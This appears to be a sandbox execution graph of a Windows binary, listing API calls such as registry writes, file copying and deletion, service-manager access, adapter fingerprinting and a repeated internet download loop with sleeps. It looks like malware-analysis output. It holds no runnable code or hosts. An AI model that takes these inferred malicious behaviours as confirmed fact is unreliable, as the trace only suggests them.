                                                                                execution_graph 18052 40b880 18053 40b95c lstrcmpiW 18052->18053 18056 2d8f8da LoadLibraryA 18057 2d8f9bd 18056->18057 18058 2d8f903 GetProcAddress 18056->18058 18059 2d8f9b6 FreeLibrary 18058->18059 18062 2d8f917 18058->18062 18059->18057 18060 2d8f929 GetAdaptersInfo 18060->18062 18061 2d8f9b1 18061->18059 18062->18060 18062->18061 18064 2d93a8f 18062->18064 18066 2d93a97 18064->18066 18067 2d93ab1 18066->18067 18069 2d93ab5 std::exception::exception 18066->18069 18072 2d92eec 18066->18072 18089 2d98143 RtlDecodePointer 18066->18089 18067->18062 18091 2d9449a 18069->18091 18071 2d93adf 18073 2d92f67 18072->18073 18082 2d92ef8 18072->18082 18074 2d98143 __calloc_impl RtlDecodePointer 18073->18074 18075 2d92f6d 18074->18075 18076 2d95d9b __set_osfhnd 58 API calls 18075->18076 18079 2d92f5f 18076->18079 18078 2d92f2b RtlAllocateHeap 18078->18079 18078->18082 18079->18066 18081 2d92f53 18141 2d95d9b 18081->18141 18082->18078 18082->18081 18083 2d92f03 18082->18083 18084 2d98143 __calloc_impl RtlDecodePointer 18082->18084 18087 2d92f51 18082->18087 18083->18082 18094 2d98613 18083->18094 18103 2d98670 18083->18103 18138 2d9825c 18083->18138 18084->18082 18088 2d95d9b __set_osfhnd 58 API calls 18087->18088 18088->18079 18090 2d98156 18089->18090 18090->18066 18093 2d944b9 RaiseException 18091->18093 18093->18071 18144 2da00be 18094->18144 18096 2d9861a 18097 2d98627 18096->18097 18098 2da00be __NMSG_WRITE 59 API calls 18096->18098 18099 2d98670 __NMSG_WRITE 59 API calls 18097->18099 18101 2d98649 18097->18101 18098->18097 18100 2d9863f 18099->18100 18102 2d98670 __NMSG_WRITE 59 API calls 18100->18102 18101->18083 18102->18101 18104 2d9868e __NMSG_WRITE 18103->18104 18106 2da00be __NMSG_WRITE 55 API calls 18104->18106 18137 2d987b5 18104->18137 18105 2d9448b __except_handler4 6 API calls 18107 2d9881e 18105->18107 18108 2d986a1 18106->18108 18107->18083 18109 2d987ba GetStdHandle 18108->18109 18110 2da00be __NMSG_WRITE 55 API calls 18108->18110 18113 2d987c8 _strlen 18109->18113 18109->18137 18111 2d986b2 18110->18111 18111->18109 18112 2d986c4 18111->18112 18112->18137 18188 2d9f47d 18112->18188 18116 2d98801 WriteFile 18113->18116 18113->18137 18116->18137 18117 2d986f1 GetModuleFileNameW 18119 2d98711 18117->18119 18124 2d98721 __NMSG_WRITE 18117->18124 18118 2d98822 18120 2d94e45 __invoke_watson 8 API calls 18118->18120 18121 2d9f47d __NMSG_WRITE 55 API calls 18119->18121 18122 2d9882c 18120->18122 18121->18124 18123 2d98851 RtlEnterCriticalSection 18122->18123 18240 2d988b5 18122->18240 18123->18083 18124->18118 18132 2d98767 18124->18132 18197 2d9f4f2 18124->18197 18128 2d98844 18128->18123 18262 2d9837f 18128->18262 18130 2d9f411 __NMSG_WRITE 55 API calls 18133 2d9879e 18130->18133 18132->18118 18206 2d9f411 18132->18206 18133->18118 18135 2d987a5 18133->18135 18215 2da00fe RtlEncodePointer 18135->18215 18137->18105 18325 2d98228 GetModuleHandleExW 18138->18325 18328 2d95bb2 GetLastError 18141->18328 18143 2d95da0 18143->18087 18145 2da00c8 18144->18145 18146 2da00d2 18145->18146 18147 2d95d9b __set_osfhnd 59 API calls 18145->18147 18146->18096 18148 2da00ee 18147->18148 18151 2d94e35 18148->18151 18154 2d94e0a RtlDecodePointer 18151->18154 18155 2d94e1d 18154->18155 18160 2d94e45 IsProcessorFeaturePresent 18155->18160 18158 2d94e0a __fclose_nolock 8 API calls 18159 2d94e41 18158->18159 18159->18096 18161 2d94e50 18160->18161 18166 2d94cd8 18161->18166 18165 2d94e34 18165->18158 18167 2d94cf2 _memset ___raise_securityfailure 18166->18167 18168 2d94d12 IsDebuggerPresent 18167->18168 18174 2d99468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18168->18174 18171 2d94dd6 ___raise_securityfailure 18175 2d9448b 18171->18175 18172 2d94df9 18173 2d99453 GetCurrentProcess TerminateProcess 18172->18173 18173->18165 18174->18171 18176 2d94493 18175->18176 18177 2d94495 IsProcessorFeaturePresent 18175->18177 18176->18172 18179 2d994cf 18177->18179 18182 2d9947e IsDebuggerPresent 18179->18182 18183 2d99493 ___raise_securityfailure 18182->18183 18184 2d99468 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 18183->18184 18185 2d9949b ___raise_securityfailure 18184->18185 18186 2d99453 ___raise_securityfailure GetCurrentProcess TerminateProcess 18185->18186 18187 2d994b8 18186->18187 18187->18172 18189 2d9f488 18188->18189 18191 2d9f496 18188->18191 18189->18191 18194 2d9f4af 18189->18194 18190 2d95d9b __set_osfhnd 59 API calls 18192 2d9f4a0 18190->18192 18191->18190 18193 2d94e35 __fclose_nolock 9 API calls 18192->18193 18195 2d986e4 18193->18195 18194->18195 18196 2d95d9b __set_osfhnd 59 API calls 18194->18196 18195->18117 18195->18118 18196->18192 18202 2d9f500 18197->18202 18198 2d9f504 18199 2d95d9b __set_osfhnd 59 API calls 18198->18199 18200 2d9f509 18198->18200 18201 2d9f534 18199->18201 18200->18132 18203 2d94e35 __fclose_nolock 9 API calls 18201->18203 18202->18198 18202->18200 18204 2d9f543 18202->18204 18203->18200 18204->18200 18205 2d95d9b __set_osfhnd 59 API calls 18204->18205 18205->18201 18207 2d9f42b 18206->18207 18210 2d9f41d 18206->18210 18208 2d95d9b __set_osfhnd 59 API calls 18207->18208 18209 2d9f435 18208->18209 18211 2d94e35 __fclose_nolock 9 API calls 18209->18211 18210->18207 18213 2d9f457 18210->18213 18212 2d98787 18211->18212 18212->18118 18212->18130 18213->18212 18214 2d95d9b __set_osfhnd 59 API calls 18213->18214 18214->18209 18216 2da0132 ___crtIsPackagedApp 18215->18216 18217 2da01f1 IsDebuggerPresent 18216->18217 18218 2da0141 LoadLibraryExW 18216->18218 18219 2da01fb 18217->18219 18220 2da0216 18217->18220 18221 2da0158 GetLastError 18218->18221 18222 2da017e GetProcAddress 18218->18222 18225 2da0202 OutputDebugStringW 18219->18225 18226 2da0209 18219->18226 18220->18226 18227 2da021b RtlDecodePointer 18220->18227 18223 2da0167 LoadLibraryExW 18221->18223 18230 2da020e 18221->18230 18224 2da0192 7 API calls 18222->18224 18222->18230 18223->18222 18223->18230 18228 2da01da GetProcAddress RtlEncodePointer 18224->18228 18229 2da01ee 18224->18229 18225->18226 18226->18230 18234 2da0242 RtlDecodePointer RtlDecodePointer 18226->18234 18238 2da025a 18226->18238 18227->18230 18228->18229 18229->18217 18231 2d9448b __except_handler4 6 API calls 18230->18231 18236 2da02e0 18231->18236 18232 2da0292 RtlDecodePointer 18233 2da027e RtlDecodePointer 18232->18233 18237 2da0299 18232->18237 18233->18230 18234->18238 18236->18137 18237->18233 18239 2da02aa RtlDecodePointer 18237->18239 18238->18232 18238->18233 18239->18233 18241 2d988c1 __lseeki64 18240->18241 18242 2d988e0 18241->18242 18243 2d98613 __FF_MSGBANNER 59 API calls 18241->18243 18250 2d98903 __lseeki64 18242->18250 18269 2d989f4 18242->18269 18244 2d988cf 18243->18244 18246 2d98670 __NMSG_WRITE 59 API calls 18244->18246 18251 2d988d6 18246->18251 18248 2d9890d 18274 2d9882d 18248->18274 18249 2d988fe 18252 2d95d9b __set_osfhnd 59 API calls 18249->18252 18250->18128 18254 2d9825c _doexit 3 API calls 18251->18254 18252->18250 18254->18242 18255 2d98914 18256 2d98939 18255->18256 18257 2d98921 18255->18257 18284 2d92eb4 18256->18284 18281 2d9914c 18257->18281 18260 2d9892d 18290 2d98955 18260->18290 18263 2d98613 __FF_MSGBANNER 59 API calls 18262->18263 18264 2d98387 18263->18264 18265 2d98670 __NMSG_WRITE 59 API calls 18264->18265 18266 2d9838f 18265->18266 18295 2d9842e 18266->18295 18271 2d98a02 18269->18271 18270 2d92eec _malloc 59 API calls 18270->18271 18271->18270 18272 2d988f7 18271->18272 18293 2d99445 Sleep 18271->18293 18272->18248 18272->18249 18275 2d9883e 18274->18275 18276 2d98851 RtlEnterCriticalSection 18274->18276 18277 2d988b5 __mtinitlocknum 58 API calls 18275->18277 18276->18255 18278 2d98844 18277->18278 18278->18276 18279 2d9837f __amsg_exit 58 API calls 18278->18279 18280 2d98850 18279->18280 18280->18276 18282 2d99169 InitializeCriticalSectionAndSpinCount 18281->18282 18283 2d9915c 18281->18283 18282->18260 18283->18260 18285 2d92ebd HeapFree 18284->18285 18289 2d92ee6 __dosmaperr 18284->18289 18286 2d92ed2 18285->18286 18285->18289 18287 2d95d9b __set_osfhnd 57 API calls 18286->18287 18288 2d92ed8 GetLastError 18287->18288 18288->18289 18289->18260 18294 2d98997 RtlLeaveCriticalSection 18290->18294 18292 2d9895c 18292->18250 18293->18271 18294->18292 18298 2d984e4 18295->18298 18297 2d9839a 18299 2d984f0 __lseeki64 18298->18299 18300 2d9882d __lock 52 API calls 18299->18300 18301 2d984f7 18300->18301 18302 2d98525 RtlDecodePointer 18301->18302 18305 2d985b0 _doexit 18301->18305 18304 2d9853c RtlDecodePointer 18302->18304 18302->18305 18317 2d9854c 18304->18317 18318 2d985fe 18305->18318 18307 2d9860d __lseeki64 18307->18297 18309 2d98559 RtlEncodePointer 18309->18317 18310 2d985f5 18311 2d9825c _doexit 3 API calls 18310->18311 18313 2d985fe 18311->18313 18312 2d98569 RtlDecodePointer RtlEncodePointer 18315 2d9857b RtlDecodePointer RtlDecodePointer 18312->18315 18314 2d9860b 18313->18314 18323 2d98997 RtlLeaveCriticalSection 18313->18323 18314->18297 18315->18317 18317->18305 18317->18309 18317->18312 18319 2d985de 18318->18319 18320 2d98604 18318->18320 18319->18307 18322 2d98997 RtlLeaveCriticalSection 18319->18322 18324 2d98997 RtlLeaveCriticalSection 18320->18324 18322->18310 18323->18314 18324->18319 18326 2d98253 ExitProcess 18325->18326 18327 2d98241 GetProcAddress 18325->18327 18327->18326 18342 2d9910b 18328->18342 18330 2d95bc7 18331 2d95c15 SetLastError 18330->18331 18345 2d989ac 18330->18345 18331->18143 18335 2d95bee 18336 2d95c0c 18335->18336 18337 2d95bf4 18335->18337 18338 2d92eb4 _free 56 API calls 18336->18338 18354 2d95c21 18337->18354 18341 2d95c12 18338->18341 18340 2d95bfc GetCurrentThreadId 18340->18331 18341->18331 18343 2d9911e 18342->18343 18344 2d99122 TlsGetValue 18342->18344 18343->18330 18344->18330 18346 2d989b3 18345->18346 18348 2d95bda 18346->18348 18350 2d989d1 18346->18350 18364 2da03f8 18346->18364 18348->18331 18351 2d9912a 18348->18351 18350->18346 18350->18348 18372 2d99445 Sleep 18350->18372 18352 2d99140 18351->18352 18353 2d99144 TlsSetValue 18351->18353 18352->18335 18353->18335 18355 2d95c2d __lseeki64 18354->18355 18356 2d9882d __lock 59 API calls 18355->18356 18357 2d95c6a 18356->18357 18373 2d95cc2 18357->18373 18360 2d9882d __lock 59 API calls 18361 2d95c8b ___addlocaleref 18360->18361 18376 2d95ccb 18361->18376 18363 2d95cb6 __lseeki64 18363->18340 18365 2da0403 18364->18365 18369 2da041e 18364->18369 18366 2da040f 18365->18366 18365->18369 18368 2d95d9b __set_osfhnd 58 API calls 18366->18368 18367 2da042e RtlAllocateHeap 18367->18369 18370 2da0414 18367->18370 18368->18370 18369->18367 18369->18370 18371 2d98143 __calloc_impl RtlDecodePointer 18369->18371 18370->18346 18371->18369 18372->18350 18379 2d98997 RtlLeaveCriticalSection 18373->18379 18375 2d95c84 18375->18360 18380 2d98997 RtlLeaveCriticalSection 18376->18380 18378 2d95cd2 18378->18363 18379->18375 18380->18378 18381 402785 18382 40bab8 RegCloseKey 18381->18382 18383 4021c6 18386 401f64 FindResourceA 18383->18386 18385 4021cb 18387 401f86 GetLastError SizeofResource 18386->18387 18388 401f9f 18386->18388 18387->18388 18389 401fa6 LoadResource LockResource GlobalAlloc 18387->18389 18388->18385 18390 401fd2 18389->18390 18391 401ffb GetTickCount 18390->18391 18393 402005 GlobalAlloc 18391->18393 18393->18388 18394 40b0ca RegOpenKeyExA 18395 4025c7 18394->18395 18395->18394 18396 40b3bc 18395->18396 18397 2dd86d0 18398 2de990b ReadFile 18397->18398 18400 40278d 18401 40b54b RegSetValueExA 18400->18401 18403 2d8f7d6 CreateFileA 18404 2d8f8d2 18403->18404 18407 2d8f807 18403->18407 18405 2d8f81f DeviceIoControl 18405->18407 18406 2d8f8c8 CloseHandle 18406->18404 18407->18405 18407->18406 18408 2d8f894 GetLastError 18407->18408 18409 2d93a8f _Allocate 60 API calls 18407->18409 18408->18406 18408->18407 18409->18407 18410 2d8648b 18411 2d864ae RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 18410->18411 18489 2d842c7 18411->18489 18490 402294 18491 40ba39 VirtualAlloc 18490->18491 18492 40ba42 18491->18492 18493 2d8104d 18498 2d932e7 18493->18498 18504 2d931eb 18498->18504 18500 2d81057 18501 2d81aa9 InterlockedIncrement 18500->18501 18502 2d8105c 18501->18502 18503 2d81ac5 WSAStartup InterlockedExchange 18501->18503 18503->18502 18505 2d931f7 __lseeki64 18504->18505 18512 2d984d2 18505->18512 18511 2d9321e __lseeki64 18511->18500 18513 2d9882d __lock 59 API calls 18512->18513 18514 2d93200 18513->18514 18515 2d9322f RtlDecodePointer RtlDecodePointer 18514->18515 18516 2d9325c 18515->18516 18517 2d9320c 18515->18517 18516->18517 18529 2d9909d 18516->18529 18526 2d93229 18517->18526 18519 2d932bf RtlEncodePointer RtlEncodePointer 18519->18517 18520 2d9326e 18520->18519 18521 2d93293 18520->18521 18536 2d98a3b 18520->18536 18521->18517 18523 2d98a3b __realloc_crt 62 API calls 18521->18523 18524 2d932ad RtlEncodePointer 18521->18524 18525 2d932a7 18523->18525 18524->18519 18525->18517 18525->18524 18563 2d984db 18526->18563 18530 2d990bb RtlSizeHeap 18529->18530 18531 2d990a6 18529->18531 18530->18520 18532 2d95d9b __set_osfhnd 59 API calls 18531->18532 18533 2d990ab 18532->18533 18534 2d94e35 __fclose_nolock 9 API calls 18533->18534 18535 2d990b6 18534->18535 18535->18520 18540 2d98a42 18536->18540 18538 2d98a7f 18538->18521 18540->18538 18541 2da02e4 18540->18541 18562 2d99445 Sleep 18540->18562 18542 2da02f8 18541->18542 18543 2da02ed 18541->18543 18545 2da0300 18542->18545 18550 2da030d 18542->18550 18544 2d92eec _malloc 59 API calls 18543->18544 18546 2da02f5 18544->18546 18547 2d92eb4 _free 59 API calls 18545->18547 18546->18540 18558 2da0308 __dosmaperr 18547->18558 18548 2da0345 18549 2d98143 __calloc_impl RtlDecodePointer 18548->18549 18552 2da034b 18549->18552 18550->18548 18551 2da0315 RtlReAllocateHeap 18550->18551 18554 2da0375 18550->18554 18555 2d98143 __calloc_impl RtlDecodePointer 18550->18555 18559 2da035d 18550->18559 18551->18550 18551->18558 18553 2d95d9b __set_osfhnd 59 API calls 18552->18553 18553->18558 18556 2d95d9b __set_osfhnd 59 API calls 18554->18556 18555->18550 18557 2da037a GetLastError 18556->18557 18557->18558 18558->18540 18560 2d95d9b __set_osfhnd 59 API calls 18559->18560 18561 2da0362 GetLastError 18560->18561 18561->18558 18562->18540 18566 2d98997 RtlLeaveCriticalSection 18563->18566 18565 2d9322e 18565->18511 18566->18565 18567 2dbe002 18568 2dbe080 18567->18568 18569 2dbe009 18567->18569 18571 2dbfa26 DeleteFileA 18568->18571 18572 2dc4646 18571->18572 18573 2dcfec1 18574 2dd1738 CreateFileA 18573->18574 18576 402d60 GetVersion 18600 4039f0 HeapCreate 18576->18600 18578 402dbf 18579 402dc4 18578->18579 18580 402dcc 18578->18580 18675 402e7b 18579->18675 18612 4036d0 18580->18612 18584 402dd4 GetCommandLineA 18626 40359e 18584->18626 18588 402dee 18658 403298 18588->18658 18590 402df3 18591 402df8 GetStartupInfoA 18590->18591 18671 403240 18591->18671 18593 402e0a GetModuleHandleA 18595 402e2e 18593->18595 18681 402fe7 18595->18681 18601 403a10 18600->18601 18602 403a46 18600->18602 18688 4038a8 18601->18688 18602->18578 18605 403a2c 18607 403a49 18605->18607 18702 404618 18605->18702 18606 403a1f 18700 403dc7 HeapAlloc 18606->18700 18607->18578 18610 403a29 18610->18607 18611 403a3a HeapDestroy 18610->18611 18611->18602 18765 402e9f 18612->18765 18615 4036ef GetStartupInfoA 18618 403800 18615->18618 18619 40373b 18615->18619 18620 403827 GetStdHandle 18618->18620 18621 403867 SetHandleCount 18618->18621 18619->18618 18623 402e9f 12 API calls 18619->18623 18624 4037ac 18619->18624 18620->18618 18622 403835 GetFileType 18620->18622 18621->18584 18622->18618 18623->18619 18624->18618 18625 4037ce GetFileType 18624->18625 18625->18624 18627 4035b9 GetEnvironmentStringsW 18626->18627 18628 4035ec 18626->18628 18629 4035c1 18627->18629 18630 4035cd GetEnvironmentStrings 18627->18630 18628->18629 18632 4035dd 18628->18632 18633 403605 WideCharToMultiByte 18629->18633 18634 4035f9 GetEnvironmentStringsW 18629->18634 18631 402de4 18630->18631 18630->18632 18649 403351 18631->18649 18632->18631 18635 40368b 18632->18635 18636 40367f GetEnvironmentStrings 18632->18636 18638 403639 18633->18638 18639 40366b FreeEnvironmentStringsW 18633->18639 18634->18631 18634->18633 18640 402e9f 12 API calls 18635->18640 18636->18631 18636->18635 18641 402e9f 12 API calls 18638->18641 18639->18631 18647 4036a6 18640->18647 18642 40363f 18641->18642 18642->18639 18643 403648 WideCharToMultiByte 18642->18643 18645 403662 18643->18645 18646 403659 18643->18646 18644 4036bc FreeEnvironmentStringsA 18644->18631 18645->18639 18831 402f51 18646->18831 18647->18644 18650 403363 18649->18650 18651 403368 GetModuleFileNameA 18649->18651 18861 405042 18650->18861 18653 40338b 18651->18653 18654 402e9f 12 API calls 18653->18654 18655 4033ac 18654->18655 18656 4033bc 18655->18656 18657 402e56 7 API calls 18655->18657 18656->18588 18657->18656 18659 4032a5 18658->18659 18661 4032aa 18658->18661 18660 405042 19 API calls 18659->18660 18660->18661 18662 402e9f 12 API calls 18661->18662 18663 4032d7 18662->18663 18664 402e56 7 API calls 18663->18664 18670 4032eb 18663->18670 18664->18670 18665 40332e 18666 402f51 7 API calls 18665->18666 18667 40333a 18666->18667 18667->18590 18668 402e9f 12 API calls 18668->18670 18669 402e56 7 API calls 18669->18670 18670->18665 18670->18668 18670->18669 18672 403249 18671->18672 18674 40324e 18671->18674 18673 405042 19 API calls 18672->18673 18673->18674 18674->18593 18676 402e84 18675->18676 18677 402e89 18675->18677 18678 403c20 7 API calls 18676->18678 18679 403c59 7 API calls 18677->18679 18678->18677 18680 402e92 ExitProcess 18679->18680 18885 403009 18681->18885 18684 4030bc 18685 4030c8 18684->18685 18686 4031f1 UnhandledExceptionFilter 18685->18686 18687 402e48 18685->18687 18686->18687 18711 402c40 18688->18711 18691 4038d1 18692 4038eb GetEnvironmentVariableA 18691->18692 18694 4038e3 18691->18694 18693 4039c8 18692->18693 18696 40390a 18692->18696 18693->18694 18716 40387b GetModuleHandleA 18693->18716 18694->18605 18694->18606 18697 40394f GetModuleFileNameA 18696->18697 18698 403947 18696->18698 18697->18698 18698->18693 18713 40505e 18698->18713 18701 403de3 18700->18701 18701->18610 18703 404625 18702->18703 18704 40462c HeapAlloc 18702->18704 18705 404649 VirtualAlloc 18703->18705 18704->18705 18706 404681 18704->18706 18707 404669 VirtualAlloc 18705->18707 18708 40473e 18705->18708 18706->18610 18707->18706 18709 404730 VirtualFree 18707->18709 18708->18706 18710 404746 HeapFree 18708->18710 18709->18708 18710->18706 18712 402c4c GetVersionExA 18711->18712 18712->18691 18712->18692 18718 405075 18713->18718 18717 403892 18716->18717 18717->18694 18720 40508d 18718->18720 18722 4050bd 18720->18722 18725 405d39 18720->18725 18721 405d39 6 API calls 18721->18722 18722->18721 18724 405071 18722->18724 18729 405c6d 18722->18729 18724->18693 18726 405d57 18725->18726 18727 405d4b 18725->18727 18735 405b24 18726->18735 18727->18720 18730 405c98 18729->18730 18734 405c7b 18729->18734 18731 405cb4 18730->18731 18732 405d39 6 API calls 18730->18732 18731->18734 18747 4058d5 18731->18747 18732->18731 18734->18722 18736 405b6d 18735->18736 18737 405b55 GetStringTypeW 18735->18737 18738 405b98 GetStringTypeA 18736->18738 18739 405bbc 18736->18739 18737->18736 18740 405b71 GetStringTypeA 18737->18740 18741 405c59 18738->18741 18739->18741 18743 405bd2 MultiByteToWideChar 18739->18743 18740->18736 18740->18741 18741->18727 18743->18741 18744 405bf6 18743->18744 18744->18741 18745 405c30 MultiByteToWideChar 18744->18745 18745->18741 18746 405c49 GetStringTypeW 18745->18746 18746->18741 18748 405905 LCMapStringW 18747->18748 18749 405921 18747->18749 18748->18749 18750 405929 LCMapStringA 18748->18750 18751 405987 18749->18751 18752 40596a LCMapStringA 18749->18752 18750->18749 18753 405a63 18750->18753 18751->18753 18754 40599d MultiByteToWideChar 18751->18754 18752->18753 18753->18734 18754->18753 18755 4059c7 18754->18755 18755->18753 18756 4059fd MultiByteToWideChar 18755->18756 18756->18753 18757 405a16 LCMapStringW 18756->18757 18757->18753 18758 405a31 18757->18758 18759 405a37 18758->18759 18761 405a77 18758->18761 18759->18753 18760 405a45 LCMapStringW 18759->18760 18760->18753 18761->18753 18762 405aaf LCMapStringW 18761->18762 18762->18753 18763 405ac7 WideCharToMultiByte 18762->18763 18763->18753 18774 402eb1 18765->18774 18768 402e56 18769 402e64 18768->18769 18770 402e5f 18768->18770 18817 403c59 18769->18817 18811 403c20 18770->18811 18775 402eae 18774->18775 18777 402eb8 18774->18777 18775->18615 18775->18768 18777->18775 18778 402edd 18777->18778 18779 402eec 18778->18779 18782 402f01 18778->18782 18786 402efa 18779->18786 18787 404163 18779->18787 18781 402f40 HeapAlloc 18783 402f4f 18781->18783 18782->18781 18782->18786 18793 404910 18782->18793 18783->18777 18784 402eff 18784->18777 18786->18781 18786->18783 18786->18784 18790 404195 18787->18790 18788 404234 18792 404243 18788->18792 18807 40451d 18788->18807 18790->18788 18790->18792 18800 40446c 18790->18800 18792->18786 18799 40491e 18793->18799 18794 404a0a VirtualAlloc 18798 4049db 18794->18798 18795 404adf 18796 404618 5 API calls 18795->18796 18796->18798 18798->18786 18799->18794 18799->18795 18799->18798 18801 4044af HeapAlloc 18800->18801 18802 40447f HeapReAlloc 18800->18802 18804 4044ff 18801->18804 18805 4044d5 VirtualAlloc 18801->18805 18803 40449e 18802->18803 18802->18804 18803->18801 18804->18788 18805->18804 18806 4044ef HeapFree 18805->18806 18806->18804 18808 40452f VirtualAlloc 18807->18808 18810 404578 18808->18810 18810->18792 18812 403c2a 18811->18812 18813 403c57 18812->18813 18814 403c59 7 API calls 18812->18814 18813->18769 18815 403c41 18814->18815 18816 403c59 7 API calls 18815->18816 18816->18813 18819 403c6c 18817->18819 18818 403d83 18821 403d96 GetStdHandle WriteFile 18818->18821 18819->18818 18820 403cac 18819->18820 18825 402e6d 18819->18825 18822 403cb8 GetModuleFileNameA 18820->18822 18820->18825 18821->18825 18823 403cd0 18822->18823 18826 405408 18823->18826 18825->18615 18827 405415 LoadLibraryA 18826->18827 18829 405457 18826->18829 18828 405426 GetProcAddress 18827->18828 18827->18829 18828->18829 18830 40543d GetProcAddress GetProcAddress 18828->18830 18829->18825 18830->18829 18832 402f5d 18831->18832 18840 402f79 18831->18840 18833 402f67 18832->18833 18834 402f7d 18832->18834 18836 402fa9 HeapFree 18833->18836 18837 402f73 18833->18837 18835 402fa8 18834->18835 18839 402f97 18834->18839 18835->18836 18836->18840 18842 403e3a 18837->18842 18848 4048cb 18839->18848 18840->18645 18843 403e78 18842->18843 18847 40412e 18842->18847 18844 404074 VirtualFree 18843->18844 18843->18847 18845 4040d8 18844->18845 18846 4040e7 VirtualFree HeapFree 18845->18846 18845->18847 18846->18847 18847->18840 18849 4048f8 18848->18849 18850 40490e 18848->18850 18849->18850 18852 4047b2 18849->18852 18850->18840 18855 4047bf 18852->18855 18853 40486f 18853->18850 18854 4047e0 VirtualFree 18854->18855 18855->18853 18855->18854 18857 40475c VirtualFree 18855->18857 18858 404779 18857->18858 18859 4047a9 18858->18859 18860 404789 HeapFree 18858->18860 18859->18855 18860->18855 18862 40504b 18861->18862 18863 405052 18861->18863 18865 404c7e 18862->18865 18863->18651 18872 404e17 18865->18872 18867 404e0b 18867->18863 18870 404cc1 GetCPInfo 18871 404cd5 18870->18871 18871->18867 18877 404ebd GetCPInfo 18871->18877 18873 404e37 18872->18873 18874 404e27 GetOEMCP 18872->18874 18875 404e3c GetACP 18873->18875 18876 404c8f 18873->18876 18874->18873 18875->18876 18876->18867 18876->18870 18876->18871 18878 404fa8 18877->18878 18881 404ee0 18877->18881 18878->18867 18879 405b24 6 API calls 18880 404f5c 18879->18880 18882 4058d5 9 API calls 18880->18882 18881->18879 18883 404f80 18882->18883 18884 4058d5 9 API calls 18883->18884 18884->18878 18886 403015 GetCurrentProcess TerminateProcess 18885->18886 18887 403026 18885->18887 18886->18887 18888 402e37 18887->18888 18889 403090 ExitProcess 18887->18889 18888->18684 18890 4022a2 18891 4027a6 CopyFileA 18890->18891 18893 402224 18894 4025f1 LoadLibraryExA 18893->18894 18896 40b8aa 18897 40b8ad GetLocalTime 18896->18897 18901 401f27 18897->18901 18902 401f3c 18901->18902 18905 401a1d 18902->18905 18904 401f45 18906 401a2c 18905->18906 18911 401a4f CreateFileA 18906->18911 18910 401a3e 18910->18904 18912 401a35 18911->18912 18915 401a7d 18911->18915 18919 401b4b LoadLibraryA 18912->18919 18913 401a98 DeviceIoControl 18913->18915 18915->18913 18916 401b3a CloseHandle 18915->18916 18917 401b0e GetLastError 18915->18917 18928 402ba6 18915->18928 18931 402b98 18915->18931 18916->18912 18917->18915 18917->18916 18920 401c21 18919->18920 18921 401b6e GetProcAddress 18919->18921 18920->18910 18922 401c18 FreeLibrary 18921->18922 18925 401b85 18921->18925 18922->18920 18923 401b95 GetAdaptersInfo 18923->18925 18924 402ba6 7 API calls 18924->18925 18925->18923 18925->18924 18926 401c15 18925->18926 18927 402b98 12 API calls 18925->18927 18926->18922 18927->18925 18929 402f51 7 API calls 18928->18929 18930 402baf 18929->18930 18930->18915 18932 402eb1 12 API calls 18931->18932 18933 402ba3 18932->18933 18933->18915 18934 40226b OpenSCManagerA 18935 4027e2 18934->18935 18936 4022af Sleep 18937 40b944 18936->18937 18938 402231 18939 4025f9 CreateDirectoryA 18938->18939 18940 40b537 18939->18940 18941 2de31af 18942 2de3b04 WriteFile 18941->18942 18944 402772 RegQueryValueExA 18945 2d872ab InternetOpenA 18946 2d872c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 18945->18946 18980 2d866f4 _memset shared_ptr 18945->18980 18952 2d87342 _memset 18946->18952 18947 2d87322 InternetOpenUrlA 18948 2d87382 InternetCloseHandle 18947->18948 18947->18952 18948->18980 18949 2d86708 Sleep 18951 2d8670e RtlEnterCriticalSection RtlLeaveCriticalSection 18949->18951 18950 2d87346 InternetReadFile 18950->18952 18953 2d87377 InternetCloseHandle 18950->18953 18951->18980 18952->18947 18952->18950 18953->18948 18954 2d873e9 RtlEnterCriticalSection RtlLeaveCriticalSection 19056 2d9227c 18954->19056 18956 2d9227c 66 API calls 18956->18980 18957 2d92eec _malloc 59 API calls 18958 2d8749d RtlEnterCriticalSection RtlLeaveCriticalSection 18957->18958 18958->18980 18959 2d8776a RtlEnterCriticalSection RtlLeaveCriticalSection 18959->18980 18963 2d878e2 RtlEnterCriticalSection 18964 2d8790f RtlLeaveCriticalSection 18963->18964 18963->18980 19108 2d83c67 18964->19108 18966 2d92eec 59 API calls _malloc 18966->18980 18967 2d92eb4 59 API calls _free 18967->18980 18973 2d93a8f _Allocate 60 API calls 18973->18980 18976 2d8a658 73 API calls 18976->18980 18979 2d93529 60 API calls _strtok 18979->18980 18980->18945 18980->18949 18980->18951 18980->18954 18980->18956 18980->18957 18980->18959 18980->18963 18980->18964 18980->18966 18980->18967 18980->18973 18980->18976 18980->18979 18980->18980 18984 2d876ec Sleep 18980->18984 18985 2d876e7 shared_ptr 18980->18985 18988 2d85119 18980->18988 19017 2d8ab42 18980->19017 19027 2d861f5 18980->19027 19030 2d8826e 18980->19030 19036 2d8d04a 18980->19036 19041 2d8831d 18980->19041 19049 2d833b2 18980->19049 19066 2d92790 18980->19066 19069 2d8966a 18980->19069 19076 2d8a782 18980->19076 19084 2d84100 18980->19084 19088 2d92358 18980->19088 19099 2d81ba7 18980->19099 19115 2d83d7e 18980->19115 19122 2d88f36 18980->19122 19129 2d8534d 18980->19129 19080 2d91830 18984->19080 18985->18984 18989 2d85123 __EH_prolog 18988->18989 19139 2d90a50 18989->19139 18992 2d83c67 72 API calls 18993 2d8514a 18992->18993 18994 2d83d7e 64 API calls 18993->18994 18995 2d85158 18994->18995 18996 2d8826e 89 API calls 18995->18996 18997 2d8516c 18996->18997 18998 2d85322 shared_ptr 18997->18998 19143 2d8a658 18997->19143 18998->18980 19001 2d851c4 19003 2d8a658 73 API calls 19001->19003 19002 2d851f6 19004 2d8a658 73 API calls 19002->19004 19005 2d851d4 19003->19005 19006 2d85207 19004->19006 19005->18998 19008 2d8a658 73 API calls 19005->19008 19006->18998 19007 2d8a658 73 API calls 19006->19007 19009 2d8524a 19007->19009 19010 2d852b4 19008->19010 19009->18998 19011 2d8a658 73 API calls 19009->19011 19010->18998 19012 2d8a658 73 API calls 19010->19012 19011->19005 19013 2d852da 19012->19013 19013->18998 19014 2d8a658 73 API calls 19013->19014 19015 2d85304 19014->19015 19148 2d8ce0c 19015->19148 19018 2d8ab4c __EH_prolog 19017->19018 19199 2d8d021 19018->19199 19020 2d8ab6d shared_ptr 19202 2d92030 19020->19202 19022 2d8ab84 